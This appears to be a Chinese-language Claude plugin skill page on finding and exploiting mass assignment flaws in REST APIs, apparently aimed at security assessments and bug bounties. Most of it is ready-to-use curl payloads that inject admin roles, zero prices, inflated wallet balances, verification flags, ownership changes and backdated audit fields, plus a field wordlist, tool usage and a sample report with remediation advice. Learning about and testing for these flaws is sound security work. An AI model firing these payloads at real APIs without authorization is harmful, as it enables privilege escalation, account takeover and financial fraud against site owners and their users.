Discovers and exploits mass assignment vulnerabilities in REST APIs by injecting unexpected parameters to escalate privileges, modify restricted fields, and bypass authorization. Useful for API security assessments and bug bounties.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 测试接受 JSON 输入用于创建或更新资源的 REST API 时
Discovers and exploits mass assignment vulnerabilities in REST APIs for privilege escalation, restricted field updates, and auth bypass during security testing of Rails, Django, Laravel, Spring apps.
Guides discovery and exploitation of mass assignment vulnerabilities in REST APIs via parameter injection for privilege escalation and authorization bypass. For testing Rails, Django, Laravel apps.
Tests API endpoints for mass assignment vulnerabilities by injecting unauthorized fields like role, isAdmin, price, balance into requests. Useful for OWASP API3:2023 BOLA audits in Rails, Django, Express, Spring apps.
Share bugs, ideas, or general feedback.
# 检查 API 响应以识别所有对象字段
curl -H "Authorization: Bearer USER_TOKEN" http://target.com/api/users/me | jq .
# 响应揭示字段:id、username、email、role、isAdmin、verified、balance
# 检查 API 文档中暴露的模式
curl http://target.com/api/docs
curl http://target.com/swagger.json
curl http://target.com/openapi.yaml
# 使用 Arjun 发现隐藏参数
arjun -u http://target.com/api/users/me -m JSON -H "Authorization: Bearer USER_TOKEN"
# 比较创建/更新请求体与响应体
# 响应可能包含比请求发送更多的字段
# 这些额外字段是批量赋值候选者
# 在个人资料更新中注入角色/管理员字段
curl -X PUT http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"username":"testuser","email":"test@test.com","role":"admin"}'
# 尝试常见管理员字段名
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"isAdmin":true}'
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"is_admin":true,"admin":true,"role":"superadmin","user_type":"admin","privilege_level":99}'
# 在注册期间测试
curl -X POST http://target.com/api/register \
-H "Content-Type: application/json" \
-d '{"username":"newadmin","password":"pass123","email":"admin@evil.com","role":"admin","isAdmin":true}'
# 修改价格或余额字段
curl -X POST http://target.com/api/orders \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"product_id":1,"quantity":1,"price":0.01}'
# 修改账户余额
curl -X PATCH http://target.com/api/wallet \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"balance":999999}'
# 修改折扣或优惠券字段
curl -X POST http://target.com/api/checkout \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"cart_id":123,"discount_percent":100,"coupon_code":"NONE"}'
# 修改订阅级别
curl -X PATCH http://target.com/api/subscription \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"plan":"enterprise","price":0}'
# 绕过电子邮件验证
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"email_verified":true,"verified":true,"active":true}'
# 修改账户状态
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"status":"active","banned":false,"suspended":false}'
# 修改所有权/组织
curl -X PATCH http://target.com/api/users/me \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"organization_id":"target-org-uuid","team_id":"admin-team"}'
# 更改资源所有权
curl -X PATCH http://target.com/api/documents/123 \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"owner_id":"admin-user-id"}'
# 分配到不同组/团队
curl -X PATCH http://target.com/api/projects/456 \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"team_id":"privileged-team","access_level":"write"}'
# 修改 created_at/updated_at 以操纵审计日志
curl -X PATCH http://target.com/api/entries/789 \
-H "Authorization: Bearer USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"created_at":"2020-01-01","created_by":"other-user-id"}'
# 使用 Burp Intruder 配合字段名字典
# 常见批量赋值字段字典:
# role、admin、isAdmin、is_admin、user_type、privilege、level
# verified、email_verified、active、banned、suspended
# balance、credits、price、discount、plan、tier
# owner_id、organization_id、team_id、group_id
# Python 自动化脚本
python3 mass_assignment_tester.py \
--url http://target.com/api/users/me \
--method PATCH \
--token "Bearer USER_TOKEN" \
--fields-file mass_assignment_fields.txt
# Nuclei 批量赋值模板
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/mass-assignment.yaml
| 概念 | 定义 |
|---|---|
| 批量赋值(Mass Assignment) | ORM 将请求参数自动绑定到模型属性而不加限制 |
| 自动绑定(Autobinding) | 将 HTTP 参数直接映射到对象属性的框架功能 |
| 允许列表(Allowlist) | 用于更新操作的服务器端允许字段列表(Rails 中的 strong_parameters) |
| 拒绝列表(Denylist) | 禁止字段列表(不如允许列表方法安全) |
| 隐藏字段(Hidden Fields) | 服务器管理的字段(role、balance),不在表单中显示但被 API 接受 |
| DTO(数据传输对象) | 使用单独对象分离输入和数据库以防止批量赋值的模式 |
| 参数污染(Parameter Pollution) | 在合法参数旁边发送意外的额外参数 |
| 工具 | 用途 |
|---|---|
| Burp Suite | API 请求拦截和参数注入 |
| Postman | API 测试和基于集合的批量赋值测试 |
| Arjun | API 端点的隐藏参数发现工具 |
| param-miner | 用于发现隐藏参数的 Burp 扩展 |
| OWASP ZAP | 带参数注入的自动化 API 扫描 |
| swagger-codegen | 从 OpenAPI 规范生成用于测试的 API 客户端 |
"role":"admin" 或 "isAdmin":true 以获取管理员访问权限price 或 discount 字段以较低价格购买商品email_verified:true 以绕过验证要求email 或 phone 字段修改为攻击者控制的值,然后触发密码重置plan:"enterprise" 以无需付款获取高级功能## 批量赋值漏洞报告
- **目标**: http://target.com/api/users/me
- **方法**: PATCH
- **框架**: Ruby on Rails(通过 X-Powered-By 检测)
### 发现
| # | 端点 | 注入字段 | 原始值 | 修改值 | 影响 |
|---|----------|---------------|----------|----------|--------|
| 1 | PATCH /api/users/me | role | "user" | "admin" | 权限提升 |
| 2 | POST /api/orders | price | 99.99 | 0.01 | 财务损失 |
| 3 | PATCH /api/users/me | email_verified | false | true | 验证绕过 |
### 修复建议
- 为所有模型更新操作实施允许列表(strong_parameters)
- 使用 DTO/ViewModel 将 API 输入与数据库模型解耦
- 对敏感属性应用字段级授权检查
- 记录并警报尝试修改受限字段的行为